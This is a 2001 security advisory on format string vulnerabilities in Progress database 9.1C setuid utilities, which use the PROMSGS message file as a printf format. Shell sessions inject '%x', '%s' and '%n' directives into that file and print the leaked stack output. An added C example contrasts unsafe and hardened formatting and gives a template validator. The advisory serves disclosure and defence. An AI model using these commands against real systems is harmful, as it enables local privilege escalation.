[UNIX] Progress Database PROMSGS Format String Vulnerabilities
From: support@securiteam.com
Date: 11/07/01
From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] Progress Database PROMSGS Format String Vulnerabilities
Message-Id: <20011107062509.37EFB138C0@mail.der-keiler.de>
Date: Wed, 7 Nov 2001 07:25:09 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Progress Database PROMSGS Format String Vulnerabilities
------------------------------------------------------------------------
SUMMARY
The <http://www.progress.com/> Progress database ships with several
setuid utilities that read the message file named by the PROMSGS
environment variable and use its contents directly as a printf-style
format string. An attacker who controls that file can therefore insert
format directives into it, which the utilities interpret; this discloses
stack memory and, with "%n", allows execution of arbitrary code.
DETAILS
Vulnerable systems:
Progress version 9.1C
Example:
$ echo blah > file
$ export PROMSGS=./file
$ ./_probuild
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 290
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 96
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 24
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
Test to make sure they fixed the original hole with the buffer overflows:
$ echo `perl -e 'print "A" x 20000'` > file
$ ./_probuild
Error formatting message 96. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting message 24. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA AA
AAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
However, if you use a format string instead of an 'A', you will get much
better results:
$ echo `perl -e 'print "%x" x 9000'` > file
$ ./_probuild
Error formatting message 96. Message file is corrupt.
0x00x00x3e0x83c63500xbffff81c0x10x00x8062d350x3cc6140x00xbffffd4f0x782578250x782578250
x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7340x80618450x00x83
e3ec00x83e3ec00x83c7b200x900x83c63500xbffff81c0x10xbffff66c0x00x401e5f2c0x10000x401e4
4a00xbffff6680x4013f2bd0x10000x401e5f2c0xbffff7180x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting message 24. Message file is corrupt.
0x837a70e0x83c63500x83e970c0x00xbffff6240x807784b0x40x83e95b00x83c63500xbffff81c0x00x
202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004
d0xbffff5440x83e3ec00xbffff6c40x83166430xbffff5440xbffff6040xc00xbffff5440x83e3ec00xbffff5440
x83e3ec00x83c63500x00x83e3ec00x50x2000x8a0xbffff5ad0x920xbffff56d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
$ echo `perl -e 'print "%s" x 9000'` > file
$ ./_probuild
Error formatting message 96. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
rcurctr overflow reading promsgs file.
(note the overflow message)
$ echo `perl -e 'print "%n" x 9000'` > file
$ ./_probuild
Error formatting message 96. Message file is corrupt.
0(tty)0(tty)6225424-20201(tty)0(tty)11573-148280(tty)-6892819728197281972819728197281972819
7-2011-225262130(tty)16064160643152014425424-20201(tty)-24520(tty)24364409617568-2456-33
95409624364-2280-3414%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting message 24. Message file is corrupt.
-2277025424-268680(tty)-2524307954-2721625424-20200(tty)82240(tty)1285782468224210571390
41978977-274816064-236426179-2748-2556192-274816064-274816064254240(tty)160645512138-
2643146-2707%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
You should be getting the idea by now...
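The mechanism behind the output above, as an added illustration that is not Progress code (the function names and the validator are my own): a message template read from the PROMSGS file handed straight to a printf-style helper as its format argument, the hardened call that passes it as a "%s" argument instead, and a template check a message-file loader could apply before formatting.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Message-formatting helper. In the vulnerable pattern the text read from
 * the file named by PROMSGS arrives here as `fmt`, so any "%x" or "%n" in
 * the file is interpreted against the caller's stack. */
int render(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
    return r;
}

/* Vulnerable form (shown for contrast, not called here): the file content
 * is the format string. */
int format_message_unsafe(char *out, size_t outlen, const char *msg)
{
    return render(out, outlen, msg);
}

/* Hardened form: the file content is only ever a "%s" argument, so any
 * directives inside it are printed literally. */
int format_message_safe(char *out, size_t outlen, const char *msg)
{
    return render(out, outlen, "%s", msg);
}

/* Validator for templates that legitimately carry placeholders: rejects
 * "%n" and any template that consumes more arguments than the caller will
 * supply. Returns the argument count, or -1 if the template is rejected. */
int check_template(const char *t, int max_args)
{
    int n = 0;
    for (; *t; t++) {
        if (*t != '%') continue;
        if (t[1] == '%') { t++; continue; }       /* literal "%%" */
        const char *p = t + 1;
        for (; *p && strchr("-+ #.0123456789*hlLqjzt", *p); p++)
            if (*p == '*') n++;                   /* '*' width/precision takes an argument */
        if (*p == 'n' || *p == '\0') return -1;   /* "%n" or truncated directive */
        if (++n > max_args) return -1;            /* more conversions than arguments */
        t = p;                                    /* skip the conversion character */
    }
    return n;
}
```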
All setuid binaries in the dlc/bin directory are affected:
$ ./_dbutil
Error formatting message 96. Message file is corrupt.
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting message 24. Message file is corrupt.
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
$ ./_mprosrv
14:03:13 Error formatting message 96. Message file is corrupt.
14:03:13 errno=0 reading promsgs file, it may have been deleted.
14:03:13 Unable to format message number 940
$ ./_mprshut
Error formatting message 96. Message file is corrupt.
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940
$ ./_proapsv
14:03:33 02 Nov 2001
Error formatting message 96. Message file is corrupt.
$ ./_progres
Error formatting message 96. Message file is corrupt.
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting message 24. Message file is corrupt.
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
$ ./_proutil
Error formatting message 96. Message file is corrupt.
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting message 24. Message file is corrupt.
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
$ ./_rfutil
Error formatting message 96. Message file is corrupt.
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940
$ ./prolib
Error formatting message 96. Message file is corrupt.
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 1943
ADDITIONAL INFORMATION
The information has been provided by <mailto:dotslash@snosoft.com> KF.